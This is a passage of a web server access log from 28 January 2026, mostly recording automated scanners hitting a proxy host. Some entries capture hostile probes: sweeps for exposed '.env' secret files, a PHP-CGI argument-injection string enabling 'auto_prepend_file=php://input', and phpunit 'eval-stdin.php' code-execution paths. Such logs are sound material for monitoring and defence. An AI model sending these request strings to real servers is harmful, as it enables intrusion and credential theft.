+0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:01:26:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:01:28:44 +0000] 404 - GET http 91.82.215.191 "/manager/text/list" [Client 74.249.128.83] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[28/Jan/2026:01:35:53 +0000] 400 - GET https localhost "/" [Client 94.102.49.155] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:01:36:45 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:01:42:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:01:44:53 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:01:46:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:01:59:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:02:10:30 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:02:18:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:02:34:05 +0000] 200 - GET http 91.82.215.191 "/" [Client 71.6.199.65] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[28/Jan/2026:02:35:36 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:02:39:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:02:54:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:02:56:33 +0000] 400 - GET http profibot.direct.quickconnect.to "/" [Client 162.142.125.117] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:02:56:34 +0000] 400 - - http localhost "-" [Client 162.142.125.117] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:02:57:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:03:01:11 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:03:05:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 37.19.223.36] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:03:06:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 176.125.228.161] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:03:06:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.202] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:03:06:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.202] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:03:06:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.202] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:03:08:12 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:03:16:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:03:17:08 +0000] 404 - GET http 91.82.215.191 "/druid/index.html" [Client 20.64.105.253] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[28/Jan/2026:03:22:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:03:23:23 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:03:26:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:03:29:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[28/Jan/2026:03:38:13 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 45.156.87.161] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[28/Jan/2026:03:39:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 45.187.12.21] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-" +[28/Jan/2026:03:49:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:03:52:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 152.32.252.94] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:03:52:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:03:52:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 152.32.252.94] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:03:53:02 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[28/Jan/2026:03:53:03 +0000] 404 - GET http 91.82.215.191 "/robots.txt" [Client 152.32.252.94] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[28/Jan/2026:03:53:03 +0000] 404 - GET http 91.82.215.191 "/sitemap.xml" [Client 152.32.252.94] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[28/Jan/2026:03:53:03 +0000] 404 - GET http 91.82.215.191 "/config.json" [Client 152.32.252.94] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[28/Jan/2026:03:53:29 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:03:53:35 +0000] 200 - GET http 91.82.215.191 "/" [Client 87.251.101.202] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[28/Jan/2026:03:55:08 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:04:05:33 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:04:06:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:04:12:49 +0000] 403 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 150] [Gzip -] "libwww-perl/5.820" "-" +[28/Jan/2026:04:15:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:04:18:50 +0000] 200 - GET http 91.82.215.191 "/" [Client 172.236.119.165] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[28/Jan/2026:04:19:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:04:32:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 185.142.236.41] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" +[28/Jan/2026:04:32:37 +0000] 404 - GET http 91.82.215.191 "/robots.txt" [Client 185.142.236.41] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:04:32:37 +0000] 404 - GET http 91.82.215.191 "/sitemap.xml" [Client 185.142.236.41] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:04:32:37 +0000] 404 - GET http 91.82.215.191 "/.well-known/security.txt" [Client 185.142.236.41] [Length 150] [Gzip -] "-" "-" +[28/Jan/2026:04:32:39 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[28/Jan/2026:04:38:31 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:04:41:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:04:42:24 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:04:47:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:05:00:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:05:04:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:05:05:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:05:05:50 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:05:10:48 +0000] 400 - GET http 91.82.215.191 "/" [Client 104.248.207.191] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[28/Jan/2026:05:10:48 +0000] 400 - GET http 91.82.215.191 "/t4" [Client 104.248.207.191] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:05:10:48 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 104.248.207.191] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[28/Jan/2026:05:18:19 +0000] 200 - GET http 91.82.215.191 "/" [Client 109.105.210.102] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[28/Jan/2026:05:22:19 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:05:25:53 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:05:31:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:05:35:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:05:40:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:05:48:15 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:05:56:19 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:05:57:13 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:05:59:03 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:05:59:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:06:04:15 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:06:04:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 176.65.148.220] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:06:23:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:06:27:08 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.6) Gecko/20040206 Firefox/0.8" "-" +[28/Jan/2026:06:27:08 +0000] 404 - GET http 91.82.215.191 "/conf/.env.dev" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" "-" +[28/Jan/2026:06:27:08 +0000] 404 - GET http 91.82.215.191 "/api/.env.prod" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" "-" +[28/Jan/2026:06:27:08 +0000] 404 - GET http 91.82.215.191 "/auth/.env.gcp" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; SLCC2; Media Center PC 6.0)" "-" +[28/Jan/2026:06:27:08 +0000] 404 - GET http 91.82.215.191 "/config/.env.1" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; Lenovo A369i Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[28/Jan/2026:06:27:08 +0000] 404 - GET http 91.82.215.191 "/config/.env.2" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; HTC_PH39100/3.26.502.56 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[28/Jan/2026:06:27:09 +0000] 400 - GET http 91.82.215.191 "/assets/env.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[28/Jan/2026:06:27:09 +0000] 400 - GET http 91.82.215.191 "/config/env.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[28/Jan/2026:06:27:10 +0000] 404 - GET http 91.82.215.191 "/apis/.env.dev" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; GT-P7310 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[28/Jan/2026:06:27:10 +0000] 404 - GET http 91.82.215.191 "/connexion.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:16.0) Gecko/20100101 Firefox/16.0" "-" +[28/Jan/2026:06:27:10 +0000] 404 - GET http 91.82.215.191 "/.env-anaconda" [Client 78.153.140.179] [Length 150] [Gzip -] "Opera/9.80 (Linux armv7l; HbbTV/1.2.1 (; Philips; ; ; ; ) CE-HTML/1.0 NETTV/6.0.2 SmartTvA/3.0.0 (PhilipsTV, 6.1.1,) en) Presto/2.12.407 Version/12.50" "-" +[28/Jan/2026:06:27:10 +0000] 404 - GET http 91.82.215.191 "/.env-api-keys" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36 OPR/16.0.1196.73" "-" +[28/Jan/2026:06:27:11 +0000] 404 - GET http 91.82.215.191 "/.env-app.conf" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10" "-" +[28/Jan/2026:06:27:11 +0000] 404 - GET http 91.82.215.191 "/.env-app.json" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36" "-" +[28/Jan/2026:06:34:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:06:35:27 +0000] 400 - - http localhost "-" [Client 80.94.95.75] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:06:39:05 +0000] 400 - - http localhost "-" [Client 80.94.95.75] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:06:42:28 +0000] 200 - GET http 91.82.215.191 "/" [Client 63.177.232.233] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[28/Jan/2026:06:42:40 +0000] 400 - - http localhost "-" [Client 80.94.95.75] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:06:45:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:06:45:49 +0000] 400 - - http localhost "-" [Client 80.94.95.75] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:06:47:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:06:47:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:06:48:51 +0000] 400 - - http localhost "-" [Client 80.94.95.75] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:06:52:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 35.203.211.126] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[28/Jan/2026:06:53:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:06:57:56 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:06:58:26 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 101.36.107.228] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:06:58:27 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 101.36.107.228] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:06:58:27 +0000] 404 - POST http 91.82.215.191 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:28 +0000] 405 - POST http 91.82.215.191 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 101.36.107.228] [Length 154] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:29 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:29 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:29 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:30 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:30 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:31 +0000] 404 - GET http 91.82.215.191 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:31 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:32 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:32 +0000] 404 - GET http 91.82.215.191 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:33 +0000] 